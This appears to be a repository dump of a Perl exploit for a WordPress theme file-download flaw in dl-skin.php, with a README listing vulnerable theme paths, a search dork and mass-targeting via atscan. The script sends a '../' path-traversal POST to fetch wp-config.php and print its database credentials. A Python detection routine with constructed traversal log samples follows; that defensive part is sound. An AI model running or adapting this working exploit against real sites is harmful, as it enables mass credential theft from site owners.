├── README.md
├── WP-dl-skin-exploit.pl
└── license.txt

/README.md:
--------------------------------------------------------------------------------

Wordpress AFD dl-skin.php Exploit

DORK:
index of /lib/scripts/dl-skin.php

Vulnerable themes:
wp-content/themes/infocus/lib/scripts/
wp-content/themes/elegance/lib/scripts/
wp-content/themes/awake/lib/scripts
wp-content/themes/fusion/lib/scripts/
wp-content/themes/Minamaze_Pro/lib/scripts/
wp-content/themes/construct/lib/scripts/
wp-content/themes/persuasion/lib/scripts/
wp-content/themes/dejavu/lib/scripts/
wp-content/themes/versatile/lib/scripts/
wp-content/themes/Melos_Pro/lib/scripts/
wp-content/themes/barracudafx/lib/scripts/
wp-content/themes/mesocolumn/lib/scripts/

EXPLOITATION:
Get wp-config.php file

USAGE:
perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php

ATSCAN MASS USAGE:
atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET"

/WP-dl-skin-exploit.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl
############################################
############################################
## WORDPRESS AFD dl-skin.php Exploit
## CODED BY ALI MEHDIOUI
## ALISAM TECHNOLOGY TEAM
############################################
## VULNERABLE THEMES:
## wp-content/themes/awake/
## wp-content/themes/elegance/
## wp-content/themes/barracudafx/
## wp-content/themes/fusion/
## wp-content/themes/dejavu/
## wp-content/themes/infocus/
## wp-content/themes/Minamaze_Pro/
## wp-content/themes/Melos_Pro/
## wp-content/themes/versatile/
## wp-content/themes/construct/
## wp-content/themes/persuasion/
## wp-content/themes/mesocolumn/
## [+][+]
## USAGE:
## perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php
## [+][+]
## ATSCAN MASS USAGE:
## atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET"

## DORKS
## DORK: index of /lib/scripts/dl-skin.php
############################################
############################################
use strict;
use warnings;
use FindBin '$Bin';
use Term::ANSIColor;
use URI::Escape;
use HTML::Entities;
use LWP::UserAgent;
print color 'reset';
print "
[+]================================================================[+]
[+]--------- Wordpress AFD timthumb-config.php Exploit -----------[+]
[+]-------------- Alisam Technology --------------[+]
[+]------ https://www.fb.com/Forces.des.tempetes.marocaines ------[+]
[+]------ https://www.youtube.com/user/aliartes ------[+]
[+]================================================================[+]
";

if (!$ARGV[0]) { print "Usage: php WP-dl-skin.php-exploit.php http://www.site.com/wp-content/themes/THEME NAME/....\n"; exit; }
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $URL=$ARGV[0];
my @error=("Target Vulnerable", "Target Not vulnerable");
$URL=~s/scripts\/(.*)//s;
$URL=$URL."scripts/dl-skin.php";
print " SCAN : ";
use HTTP::Request::Common;
$ua = LWP::UserAgent->new;
my $response=$ua->request(POST $URL, ['Content_Type' => 'form-data', '_mysite_download_skin' => '../../../../../wp-config.php']);
if ($response->content=~/DB_NAME/) {
    print color 'green'; print "$error[0]\n";
    print color 'green'; print $response->content."\n";
    print color 'reset';
}else{
    print color 'red'; print "$error[1]\n";
    print color 'reset';
}

/license.txt:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2016 Alisam Technology

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
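
Detection logic for the request WP-dl-skin-exploit.pl sends: a POST to lib/scripts/dl-skin.php whose `_mysite_download_skin` field carries a `../` path, answered with text containing `DB_NAME`. This is an added example, not part of the repository; the JSON log layout (`content_type`, `body`, `response_snippet`) is an assumption about a proxy or WAF that records request bodies, and the sample records are constructed.

```python
import json, re
from email import message_from_bytes
from urllib.parse import parse_qs, unquote

FIELD = "_mysite_download_skin"  # POST field set by the script on this page
ENDPOINT = re.compile(r"/lib/scripts/dl-skin\.php$", re.I)

def form_fields(ctype, body):
    """Parse a urlencoded or multipart/form-data body into {name: value}."""
    if not ctype.lower().startswith("multipart/form-data"):
        return {k: v[0] for k, v in parse_qs(body).items()}
    msg = message_from_bytes(b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + body.encode())
    fields = {}
    for part in msg.walk():  # the multipart root has no Content-Disposition and is skipped
        name = part.get_param("name", header="content-disposition")
        if name:
            fields[name] = (part.get_payload(decode=True) or b"").decode("utf-8", "replace").strip()
    return fields

def is_traversal(value):
    """True if the value leaves its directory once nested URL-encoding is undone."""
    prev = None
    while prev != value:  # keep decoding until stable, e.g. %252e -> %2e -> .
        prev, value = value, unquote(value)
    norm = value.replace("\\", "/")
    return norm.startswith("/") or ".." in norm.split("/") or "\x00" in norm

def flag_requests(log_lines):
    """Return (line_no, field_value, config_disclosed) for matching requests."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        r = json.loads(line)
        if r["method"] == "POST" and ENDPOINT.search(r["uri"].split("?", 1)[0]):
            value = form_fields(r["content_type"], r["body"]).get(FIELD)
            if value is not None and is_traversal(value):
                hits.append((n, value, "DB_NAME" in r["response_snippet"]))
    return hits

def rec(method, uri, ctype="", body="", resp=""):  # builds one constructed log line
    return json.dumps(dict(method=method, uri=uri, content_type=ctype, body=body, response_snippet=resp))
URI = "/wp-content/themes/awake/lib/scripts/dl-skin.php"
MULTIPART = ('--xYz\r\nContent-Disposition: form-data; name="%s"\r\n\r\n'
             '../../../../../wp-config.php\r\n--xYz--\r\n' % FIELD)
SAMPLE_LOG = [  # constructed records, not real traffic
    rec("POST", URI, "multipart/form-data; boundary=xYz", MULTIPART, "define('DB_NAME', "),
    rec("POST", URI, "application/x-www-form-urlencoded", FIELD + "=%252e%252e%252fwp-config.php"),
    rec("POST", URI, "application/x-www-form-urlencoded", FIELD + "=skin-blue"),
    rec("GET", "/index.php"),
]
```

A hit whose third element is true means the response carried wp-config.php content, so the database credentials and WordPress salts in that file should be rotated.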